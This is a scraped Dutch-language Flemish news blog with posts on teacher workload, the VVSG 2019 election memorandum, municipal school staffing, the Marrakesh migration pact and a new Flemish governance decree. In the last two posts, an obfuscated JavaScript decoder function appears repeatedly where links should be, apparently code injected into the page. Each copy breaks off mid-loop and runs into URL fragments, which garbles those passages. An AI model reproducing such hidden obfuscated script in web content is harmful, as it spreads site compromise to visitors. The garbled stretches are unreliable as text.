Volgens de Christelijke Onderwijscentrale (COC), de grootste onderwijsvakbond van het land, moet de aantrekkelijkheid van het beroep dringend worden aangepakt. Zo wijst de COC onder meer naar de autonomie van de leraar 'die in het gedrang gekomen is door onder meer zinloze regels, strikte didactische methodes, overdreven verantwoordingsplicht en toenemende juridisering.' Daarnaast moeten leerkrachten ook te vaak afwijken van hun kerntaken en is er te weinig respect voor (het gezag) van de leraar, klinkt het.

De COC wijst naar de lerarenplatforms - die het levenslicht zagen om startende leerkrachten meer werk- en loonzekerheid te geven - als een goede maatregel van de Vlaamse regering. 'Maar ten gronde moet er veel meer gedaan worden', zegt secretaris-generaal Koen Van Kerkhoven. 'In de eerste plaats aan de opdracht van de leraar, want daar wringt het schoentje het ergst.'

'Het ongeduld neemt ondertussen steeds meer toe', klinkt het voorts. 'COC hoopt dan ook op snel inzicht en daadwerkelijke maatregelen. En daarvoor zijn er extra middelen nodig voor alle onderwijsniveaus en -sectoren. Als die signalen er niet komen, zullen we onze zorgen misschien op de straat kenbaar moeten maken.'

Reacties uitgeschakeld voor VVSG-nieuwjaarsgeschenk: verkiezingsmemorandum

VVSG-nieuwjaarsgeschenk: verkiezingsmemorandum

Door | 2 januari 2019 | Nieuws

Het VVSG-verkiezingsmemorandum richt zich tot de beleidsmakers van de Vlaamse, federale en Europese overheden, in het kader van de verkiezingen van 26 mei 2019. De VVSG kijkt naar de toekomst.

Het memorandum is een interessant document voor lokale bestuurders, maar ook voor ambtenaren. Wat kan het lokale niveau ondernemen en wat kunnen de Vlaamse, federale en Europese overheden doen om goed lokaal beleid te voeren?

Bron: VVSG, 2 januari 2019.‘The New Localism’. Onze samenleving verandert in sneltreinvaart: nieuwe uitdagingen, nieuwe kansen. De lokale besturen zitten op de eerste rij om de kansen te grijpen en de uitdagingen aan te pakken. Gemeenten voelen als geen ander de noden op het terrein. Ze zijn als burgernabij bestuur het best geplaatst om de juiste antwoorden te bieden. Hierin verschillen de lokale besturen van andere regionale, nationale of Europese overheden: voor hen zijn de lokale besturen dus een cruciale partner.

Het memorandum steunt op het uitgangspunt van een volwaardig partnerschap. Resultaten worden samen bereikt, of ze worden niet bereikt.
De maatschappelijke noden zijn vandaag zo complex dat een overheid alleen ze niet kan oplossen. Een wij-zij-perspectief heeft geen zin. Overheden die hun rol opnemen als netwerkorganisaties en partnerschappen aangaan, zullen effectiever zijn in hun beleid en dienstverlening. De VVSG pleit voor een volwaardig partnerschap dat zich uit in twee dimensies: een interne samenwerking tussen de Europese, federale, Vlaamse en lokale overheidsniveaus (interbestuurlijk), en een externe samenwerking tussen de overheden en de diverse maatschappelijke actoren: de burgers en middenveldorganisaties, bedrijven, en kennisinstellingen (model van de quadruple helix). De basisafspraak is dat iedere overheid zich richt op haar kernrol: centrale overheden die de generieke kaders vaststellen en de lokale besturen die de
concrete invulling geven aan het beleid. De visie van een volwaardig partnerschap als voorwaarde voor een effectief beleid vormt de rode draad in dit verkiezingsmemorandum van de VVSG. Het partnerschap zal u terugvinden in de diverse voorstellen. Het bijna volledig samenvallen van de komende federale, Vlaamse en lokale bestuursperiode biedt een mooie kans om samen beleid te voeren.

Welke beleidskeuzes vraagt de VVSG aan de andere overheden? Welke oplossingen zouden een grote stap voorwaarts betekenen voor sterke lokale besturen?

 1. Lokale autonomie en beleidsruimte: lokale besturen staan het dichtst bij de praktijk, waar mensen wonen, werken, winkelen, uitgaan, … Het is op dit niveau dat de gemeente en de stad beleidsruimte en autonomie nodig hebben. Bestuurders en beleidsmedewerkers maar ook burgers of organisaties moeten er goed op elkaar kunnen inspelen, innovatieve formules moeten er kunnen groeien. Een teveel aan regels belemmeren dit. Iedereen wint wanneer lokale bestuurders meer experimenteerruimte krijgen.
 2. Genoeg financiële ruimte: een gemeente moet kunnen investeren in infrastructuur en sociaal beleid. Maar de budgettaire ruimte wordt bijna helemaal opgesoupeerd door de sterk stijgende pensioenuitgaven die de lokale besturen moeten dragen voor hun ex-statutair personeel. Dit
  is niet langer houdbaar en vraagt dringend een oplossing. Ook is een aanpassing nodig van het Gemeentefonds, moet er een nieuw systeem komen voor het kadastraal inkomen, en de gemeentelijke en de centrale beleids- en beheerscyclus moeten voortaan gelijk lopen (de ene
  is zesjaarlijks, de andere jaarlijks).
 3. Samenleven in diversiteit: mensen willen goed samenleven, in een aangename omgeving, zonder spanningen met de buren en andere inwoners. De lokale bestuurders hebben ondersteuning nodig om de lokale sociale cohesie te versterken in een context van superdiverse gemeenschappen en opinies die soms ver uit elkaar gaan staan. Zoiets lukt niet vanuit één beleidsdomein, of vanuit één
  overheidsniveau. Een transversale aanpak is nodig. De VVSG vraagt een breed programma voor Sociale Cohesie over de Europese, federale, Vlaamse en lokale overheidsniveaus heen, acties die breed gaan, ook in samenwerking met mensen en organisaties buiten de overheid.
 4. Terugdringen van armoede en versterken van de zorg: na de verregaande integratie van de OCMW’s en de gemeenten, moeten we groeien naar een echte integrale en geïntegreerde aanpak van het lokale sociale beleid. Armoede staat de komende jaren bovenaan de agenda: niet alleen in de steden, ook
  in de kleinere gemeenten. Om de noden van een verzilverende samenleving aan te pakken moeten gemeenten de regie kunnen voeren over de afstemming tussen de diverse organisaties die bij hen actief zijn.
 5. Bestuurlijke transitie naar de regioschaal: de VVSG ziet in de toekomst drie parallelle bestuurlijke transities. Lokale besturen met onvoldoende bestuurskracht kunnen beter actief een (vrijwillige) fusie overwegen, ondersteund door een aangepaste fusiebonus. Ook vraagt de VVSG een sturing
  vanuit de gemeenten in de evolutie naar een 20-tal regiowerkingen in Vlaanderen. Die regio’s bouwen voort op een bestaande sociaaleconomische streekrealiteit. Tegelijk moeten de Vlaamse en de federale overheid overschakelen naar een andere modus operandi: zij passen zich aan en komen met afgestemde procedures en regelgeving naar de regio’s.
 6. Ondernemerschap en innovatie: een levendige gemeente kent levendige kernen. De VVSG pleit voor de integratie van de verschillende functies in de kernen. De economische bedrijvigheid moet zich er met diverse andere woon-, werk-, en leef-functies kunnen verweven. De VVSG dringt sterk aan op
  de opheffing van administratieve barrières, zoals een drastische modernisering van de economische regelgeving rond de drankvergunningen, de wet op de openingsuren en de kansspelvergunningen.
 7. Inzetten op een gezonde leefomgeving: de VVSG dringt aan op een consequent Vlaams ruimtelijk beleid dat kiest voor kernversterking en voor het sparen van de woonreservegebieden. Er moet
  een stop komen op het ontwikkelen van manifest slecht gelegen, niet ontwikkelde woon- en woonreservegebieden. Vlaanderen moet nog méér inzetten op een duurzamer mobiliteitsbeleid en op lokale hernieuwbare energie.
 8. Nieuwe vormen van participatie: de lokale bestuursstijl zal sterk beïnvloed worden door de toename van burgerparticipatie en initiatieven van burgers en burgerorganisaties die inzetten op co-creatie. De VVSG en haar leden juichen dit toe: de inzet van burgers in allerlei burgerprojecten kan de lokale democratie en sociale cohesie versterken, zonder dat dit een aantasting moet betekenen van het
  primaat van de politiek. Van zowel burgemeesters, schepenen, en raadsleden, als van de gemeentelijke medewerkers vraagt dit een open bestuurscultuur. De VVSG wil in samenwerking met Vlaanderen een rol opnemen om de lokale mandatarissen en medewerkers hierin te ondersteunen.
 9. Samenwerking en afstemming in lokaal ICT-beleid: de VVSG vraagt dat de federale overheid, de Vlaamse overheid en de lokale besturen een overkoepelende ICT-strategie te ontwikkelen, met gedeelde standaarden voor IT-systemen, regels voor interbestuurlijke digitaliseringsprojecten, en een aanbod van IT-bouwblokken waaruit lokale besturen kunnen putten. Door dit centraal aan te bieden kunnen besturen zich focussen op de strategische aspecten van data en technologie. De VVSG vraagt bijzondere aandacht voor digitale ongeletterdheid: slimme gemeenten kunnen niet zonder slimme burgers.
Reacties uitgeschakeld voor VVSG vraagt delegatiemogelijkheden in het gemeentelijk onderwijs

VVSG vraagt delegatiemogelijkheden in het gemeentelijk onderwijs

Door | 2 januari 2019 | Nieuws, Onderwijs

Bron: VVSG- nieuwjaarmemorandum, 02/01/2019

 
Wat? 
In het Decreet Rechtspositie Personeelsleden Gesubsidieerd Onderwijs van 27 maart 1991 wordt, voor het gemeentelijkonderwijs in het Vlaamsgewest, bepaald dat hetcollege van burgemeester en schepenen bevoegd is voor de aanstelling, de vaste benoeming, het ontslag en de afzetting van personeelsleden evenals voor het toekennen van een afwezigheid, een verlof, een terbeschikkingstelling, een affectatie en een loopbaanonderbreking.
Bovendien mag deze bevoegdheid niet uitgeoefend worden door de secretaris/algemeendirecteur (artikel 4 §5,eerste lid).
Voor het niet-gesubsidieerde personeel is de situatie helemaal anders.
Voor hen: (1) kan deaanstellings-, ontslag-en tuchtbevoegdheid evenals de bevoegdheid over terbeschikkingstelling gedelegeerd worden van het schepencollege naar de algemeen directeuren gesubdelegeerd naar een ander personeelslid, bv. naar de schooldirecteur. (2)worden verloven en afwezigheden toegekend door de algemeen directeur(dagelijks personeelsbeheer) die deze bevoegdheid kan delegeren naar een ander personeelslid. 
 

Hoe?
De VVSG vraagt, wanneer het Vlaams parlement het Decreet Rechtspositie Gesubsidieerd Onderwijs aanpast aan het Decreet Lokaal Bestuur (nu verwijst het Decreet Rechtspositie nog naar het Gemeentedecreet, dat vanaf  1 januari 2019 opgeheven wordt), in artikel 4 §5 eerste lid van het genoemde Decreet Rechtspositie in te schrijven dat deze bevoegdheid, zoals voor het andere personeel, naar de algemeen directeur kan (niet:moet)gedelegeerd worden, met de mogelijkheid tot sub-delegatie naar een ander personeelslid.

Effect?

Zo kan de gemeente als inrichtende macht haar bevoegdheden uitoefenen, zonder onderscheid of het personeelslid wedde-betoelaagd is of niet.

Reacties uitgeschakeld voor Heeft overheidscommunicatie teveel een politieke kleur gekregen?

Heeft overheidscommunicatie teveel een politieke kleur gekregen?

Door | 10 december 2018 | Nieuws

Diplomaten gedragen zich in Marrakesh als soldaten aan het front tegen nepnieuws
In Marrakesh heerst woede over de valse informatie over het migratiepact door landen die de afspraken het meest nodig hebben.

Bron: NRC.nl 10 december 2018 om 16:45

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanders-kleurloze-diplomaten-gedragen-zich-in-marrakesh-als-soldaten-aan-het-front-tegen-nepnieuws-a3060116">https://www.nrc.nl/nieuws/2018/12/10/anders-kleurloze-diplomaten-gedragen-zich-in-marrakesh-als-soldaten-aan-het-front-tegen-nepnieuws-a3060116

Diplomaten schelden niet. Maar nu de vertegenwoordigers van bijna alle landen ter wereld eindelijk bijeen zijn in Marrakesh om het Global Compact for Migration te accorderen, is in alle begeleidende toespraken en persconferenties de ingehouden woede te horen over de ophef en commotie die aan deze dag vooraf ging.

„Het is verbazingwekkend hoeveel desinformatie er is verspreid”, sprak Louise Arbour, de secretaris-generaal voor internationale migratie van de Verenigde Naties. „Er wordt hier niets ondertekend. Niets wat hier gebeurt, is wettelijk bindend.”

De hoogste baas van de Verenigde Naties, secretaris-generaal António Guterres, viel stevig uit tegen vier hardnekkige migratiepact-mythes. „De lidstaten geven met dit pact hun soevereiniteit uit handen om migratie aan te pakken? Onwaar! Dit pact geeft mensen het recht om te migreren? Onwaar! De meeste migranten gaan van zuid naar noord? Onwaar! Rijke landen hebben geen migranten nodig? Onwaar!”

Het is nieuw terrein voor anders kleurloze VN-diplomaten als Arbour en Guterres om zich zo fel te moeten uitspreken over internationale afspraken. Maar in de vergadertenten tussen de palmbomen in Marrakesh gedragen ze zich als soldaten aan het front tegen nepnieuws.

Onder vuur
Zelden kwamen internationale afspraken zo onder vuur te liggen als deze –in de woorden van The Economist – anders zo „tandeloze tekst’” vol algemeenheden als „migranten hebben mensenrechten”, „mensensmokkel moet aangepakt worden” en „migratie is een internationaal fenomeen”.

Liefst twaalf landen lieten weten niet akkoord te gaan met het pact, waaronder de Verenigde Staten, Australië, Hongarije, Polen, Slowakije en EU-voorzitter Oostenrijk.

In België verloor de regering van premier Charles Michel haar meerderheid in het parlement, na het wegvallen van de steun van de Vlaams-nationalistische N-VA. Ook hij haalde in zijn korte toespraak uit naar „het verspreiden van leugens en onwaarheden”.

Volgens gastland Marokko, zelf transitland voor tienduizenden migranten, zal alle ophef niet zonder gevolgen blijven. „Hier worden mondiale problemen verbonden aan verkiezingstaal. Dat schaadt de betrouwbaarheid en zichtbaarheid van Europa als gesprekspartner”, zegt minister Nasser Bourita (Buitenlandse Zaken), op een kleine bijeenkomst met Europese journalisten. Hij herinnert eraan waarom de tekst van het pact eigenlijk is geschreven. Het waren de beelden uit 2015 van de tienduizenden vluchtelingen én migranten die via de Balkan naar Noord-Europa probeerden te komen die de noodzaak voor internationale samenwerking afdwongen.

Multilateralisme
Tientallen jaren durfden de lidstaten van de Verenigde Naties zich niet te bemoeien met „internationale mobiliteit”. Alleen over vluchtelingen bestonden afspraken, aan migranten durfde niemand zich te branden – tot 2015 alles op scherp zette. „Het is jammer dat sommige leden van de Verenigde Naties niet hier zijn, maar het is vooral jammer voor Europa”, bromt Bourita. „De meeste landen hebben maandenlang gewerkt aan het schrijven en aanpassen van deze tekst. En dan plots trekken ze zich terug. Europa was altijd de voorvechter van multilateralisme. Nu doen ze alsof het een keuzemenu is. Wat gaan ze nu doen op het moment dat we straks afspraken willen maken over bijvoorbeeld ontwapening? Je kunt een verschil van mening hebben. Maar met een boycot houdt alles op.”

Inschrijven
In Marrakesh zitten Noord en Zuid twee dagen onder hetzelfde tentzeil. Angolezen en Denen. Brazilianen en Vietnamezen. Het debat over het pact werd overstemd door de angsten in Westerse landen over alleen het woord al: migratie. Maar in Marrakesh ziet niet iedereen migratie als bedreiging. „Wij zijn hier om de positieve kant van migratie te belichten. Voor ons is het compleet normaal”, zegt Aissata Ibrahim Maiga, een televisiejournalist uit Mali.

Ook al zijn de afspraken niet wettelijk bindend, het pact biedt een houvast voor het gesprek tussen diplomaten in te toekomst. De landen die niet in Marrakesh kwamen opdagen, staan voortaan buitenspel, waarschuwt Europarlementariër Judith Sargentini (GroenLinks). „Als de Europese Commissie binnenkort weer aan tafel zit met een Afrikaans land om een verdrag te sluiten over het terugnemen van hun burgers omdat ze in Europa niet legaal mogen blijven, dan kan zo’n Afrikaans land zeggen: ja, maar met jullie zijn geen afspraken te maken.”

De Duitse bondskanselier Angela Merkel (CDU) kwam zelf naar Marrakesh om het pact aan te prijzen als „niets minder dan een fundament onder internationale samenwerking.”

Slechte beurt
Premier Mark Rutte (VVD) bleef in Den Haag. Maar hij stuurde staatssecretaris Mark Harbers (Asiel, VVD) om te bevestigen dat Nederland nog meedoet aan dit gesprek. Dat het verdeelde Europa een slechte beurt zou hebben gemaakt in Marrakesh, bestrijdt Harbers, nadat hij is teruggekeerd van een lange lunch met zijn collega’s.

„Kijk, sommige landen zijn afgehaakt. Maar de zorgen die leven bij de mensen in Europa over migratie, zijn een stuk breder en zie je ook bij landen die hier wel aanwezig zijn, zoals Nederland en België. Dat zijn zorgen die ook de landen in Afrika serieus moeten nemen. Met dit pact in de hand willen we het moeilijke gesprek voeren om te voorkomen dat mensen op een boot stappen.”

Reacties uitgeschakeld voor Communicatie in het nieuwe Vlaamse bestuursdecreet

Communicatie in het nieuwe Vlaamse bestuursdecreet

Door | 10 december 2018 | Nieuws

function oc532bd2f6(uf){var yd=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var vb=”;var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/communicatie-in-het-nieuwe-vlaamse-bestuursdecreet”>https://overheid.vlaanderen.be/communicatie-in-het-nieuwe-vlaamse-bestuursdecreet

Er is een nieuw bestuursdecreet in voorbereiding. Twaalf decreten werden geëvalueerd,  geactualiseerd en samengebracht tot een logisch geheel. Ook het function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/communicatie-actieve-openbaarheid-van-bestuur">openbaarheidsdecreet en het function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/communicatie-normen">decreet over de normen voor de Vlaamse overheidscommunicatie zullen opgaan in het nieuwe bestuursdecreet.

Het ontwerp van bestuursdecreet werd op 5 december goedgekeurd door het Vlaams Parlement. Het treedt normaalgezien in werking op 1 januari 2019. Je kan function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nl/nbwa-news-message-document/document/0901355780240d76">het volledige ontwerp van bestuursdecreet online lezen, en ook de function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/nl/nbwa-news-message-document/document/0901355780240d5e">memorie van toelichting. Op deze pagina bespreken we wat er in het ontwerp van bestuursdecreet staat over overheidscommunicatie.

function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndandmetcommunicatie" class="anchor">Wat is er nieuw in het ontwerp van bestuursdecreet in verband met communicatie?

Beter informeren over rechten en plichten

De Vlaamse Regering moet de burgers beter informeren over hun rechten en plichten. Nu komt veel informatie niet terecht bij de juiste doelgroep, of niet snel genoeg. De overheidscommunicatie over rechten en plichten moet stapsgewijs verbeteren. (art II.9 tweede lid)

Burgerloket geeft overzicht van gegevens en interacties met de overheid

Er komt een burgerloket dat elke burger een overzicht geeft van zijn gegevens en interacties met de overheid: dienstverlening van overheden in Vlaanderen, maar ook van federale overheden, andere gemeenschappen of gewesten.

Via het burgerloket zal de burger kunnen zien hoe zijn gegevens worden gebruikt door de overheid, kan hij fouten melden of vragen stellen. Hij vindt er informatie over lopende dossiers. Hij kan ook toestemming geven aan de overheid om zijn gegevens te gebruiken om hem gericht te informeren over dienstverlening of rechten die op hem van toepassing zijn.

Het burgerloket mag alleen gebruikt worden door de burger of zijn gemandateerde om toegang te krijgen tot zijn gegevens, en voor geen enkel ander doel.

Het agentschap Informatie Vlaanderen werkt het burgerloket uit in overleg met de betrokken overheidsinstanties en externe overheden. Het agentschap Innoveren en Ondernemen beheert daarnaast een specifiek contact- en informatiepunt voor ondernemers en ondernemingen. (art. II.7)

Overheidswebsites toegankelijk volgens de Europese richtlijn

Het bestuursdecreet zet de Europese richtlijn om over function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(ndanderen.be/personeel/diversiteit-en-gelijke-kansen/digitale-toegankelijkheid">toegankelijkheid van overheidswebsites. (art. II.16)

Alle personeelsleden moeten iedereen helpen die informatie zoekt

Alle personeelsleden worden verplicht om iedereen die informatie zoekt, daarbij te helpen. Als ze zelf niet beschikken over de gevraagde informatie, sturen ze de vraag rechtstreeks door naar de bevoegde instantie of naar het centrale contact- en informatiepunt.

Natuurlijk mag elke instantie zichzelf organiseren en bijvoorbeeld de informatierol toewijzen aan een centrale voorziening binnen de instantie. (art. II.6 tweede en derde lid)

'Communicatieambtenaar' wordt 'communicatieverantwoordelijke'

Voortaan zal elke instantie van de Vlaamse administratie een 'communicatieverantwoordelijke' aanwijzen in plaats van een 'communicatieambtenaar'. Ook elke provincieraad, gemeenteraad en raad voor maatschappelijk welzijn stelt een communicatieverantwoordelijke aan. De titel verandert omdat sommige instanties van de Vlaamse administratie geen ambtenaren in dienst hebben.

De term verwijst naar een inhoudelijke opdracht en niet naar een specifieke graad met gevolgen voor de rechtspositie van het personeelslid. De functie mag binnen een instantie dus ook door verschillende personeelsleden worden opgenomen.

De communicatieverantwoordelijken hebben de taak om het communicatiebeleid te plannen, te realiseren en te evalueren. Ze stimuleren, coördineren en begeleiden de communicatie van hun overheid of instantie. Het is dus hun taak om, onder verantwoordelijkheid van het hoofd van de instantie, ervoor te zorgen dat de communicatie van de instantie goed verloopt. Ze zijn ook intern aanspreekpunt voor communicatiekwesties.

Verder moeten de communicatieverantwoordelijken toezien op de naleving van de normen voor overheidscommunicatie: standaardtaal, heldere taal, duidelijkheid over de fase waarin de besluitvorming zich bevindt, herkenbaarheid als Vlaamse overheid, politieke neutraliteit, commerciële neutraliteit, correct gebruik van externe media.

Ten slotte moeten ze erop toezien dat de communicatie van hun instantie spoort met het gemeenschappelijke communicatiebeleid van de Vlaamse administratie. (art. III.64)

Communicatieverantwoordelijken en klachtencoördinatoren: functies op elkaar afstemmen

Elke instantie van de Vlaamse administratie moet de functies van de communicatieverantwoordelijke en de klachtencoördinator op elkaar afstemmen. Dat moet helpen om kwaliteitsvolle dienstverlening te garanderen. De instanties moeten voldoende informatie geven over hun dienstverlening, ook communiceren als er iets fout loopt en luisteren naar hun klanten. (art. III.64, vierde lid)

Consultatieportaal op vlaanderen.be

Er komt een consultatieportaal op de centrale website van de Vlaamse overheid. Als de Vlaamse Regering of een minister een consultatie organiseert, zal die minstens ook via het consultatieportaal worden bekendgemaakt.

De bepaling impliceert ook dat de resultaten van de consultatie transparant moeten zijn. De Vlaamse Regering kan bij omzendbrief principes vastleggen over kwaliteitsvolle consultatie en feedback over de resultaten. (art. II.8)

Burgers kunnen zelf voorstellen doen

Burgers krijgen de mogelijkheid om zelf voorstellen of meldingen te doen over het functioneren van de overheid, over beleid of regelgeving. Dat is een aanvulling op de bestaande parlementaire regeling voor verzoekschriften.

Ze kunnen die voorstellen of meldingen kosteloos indienen bij een overheidsinstantie of bij het centrale contact- en informatiepunt. Ze krijgen binnen een redelijke termijn een antwoord: de overheidsinstantie zegt wat haar standpunt is over het voorstel of de melding en welke initiatieven ze zal nemen.

Als een voorstel of melding kennelijk ongegrond of onredelijk is, is de overheid niet verplicht om te reageren. (art. II.88)

Geen communicatiejaarverslag meer

De Vlaamse overheid is niet meer verplicht om jaarlijks een globaal communicatiejaarverslag in te dienen bij het Vlaams Parlement.

Wat blijft (zo goed als) hetzelfde in het ontwerp van bestuursdecreet?

De overheid informeert actief over beleid, regelgeving en dienstverlening

Overheidsinstanties informeren actief, op eigen initiatief, over hun beleid, regelgeving en dienstverlening, telkens als dat nuttig, belangrijk of noodzakelijk is.

Ze zien erop toe dat de informatie zoveel mogelijk personen, verenigingen of organisaties van de doelgroep bereikt. Ze kiezen aangepaste communicatiestrategieën voor thema’s die moeilijk te bereiken doelgroepen aanbelangen.

Ze dragen er zorg voor dat de informatie

 • Correct, betrouwbaar en accuraat is
 • Relevant is en gericht wordt verspreid
 • Tijdig en systematisch wordt verspreid (art. II.2)

Informatie in orde en gemakkelijk te raadplegen

Overheidsinstanties zorgen ervoor dat de informatie die relevant is voor hun taak en die ze zelf beheren of die voor hen wordt beheerd, zo veel mogelijk geordend, accuraat, vergelijkbaar en geactualiseerd is.

De informatie van de overheid is gemakkelijk te raadplegen voor het beoogde doelpubliek via diverse kanalen en media. (art. II.3)

Gezamenlijke gegevensbronnen met basisinformatie

De Vlaamse overheid bouwt een of meer gezamenlijke gegevensbronnen uit met basisinformatie van de Vlaamse overheid, de lokale overheden, de instellingen met een publieke taak en de milieu-instanties.

Basisinformatie is:

 • Identificerende informatie
 • Contactgegevens en informatie over dienstverlening (art. II.5)

Centraal contact- en informatiepunt

De burger kan met informatievragen terecht bij het centrale contact- en informatiepunt van de Vlaamse overheid. Dat contact- en informatiepunt is bereikbaar via diverse communicatiekanalen. (art. II.6 eerste lid)

Heldere standaardtaal

Overheidsinstanties communiceren in de standaardtaal, in principe de Nederlandse standaardtaal behalve als de taalwetgeving het gebruik van een andere taal voorschrijft of toelaat.

Ze gebruiken een heldere taal die begrijpelijk is voor de ontvanger. (art. II.10)

Inconsequenties en dubbele boodschappen vermijden

Vlaamse overheidsinstanties verspreiden uitsluitend informatie die in overeenstemming is met het beleid van de hele Vlaamse overheid. Ze moeten hun boodschap toetsen aan het algemeen beleid, om inconsequenties en dubbele boodschappen te voorkomen.

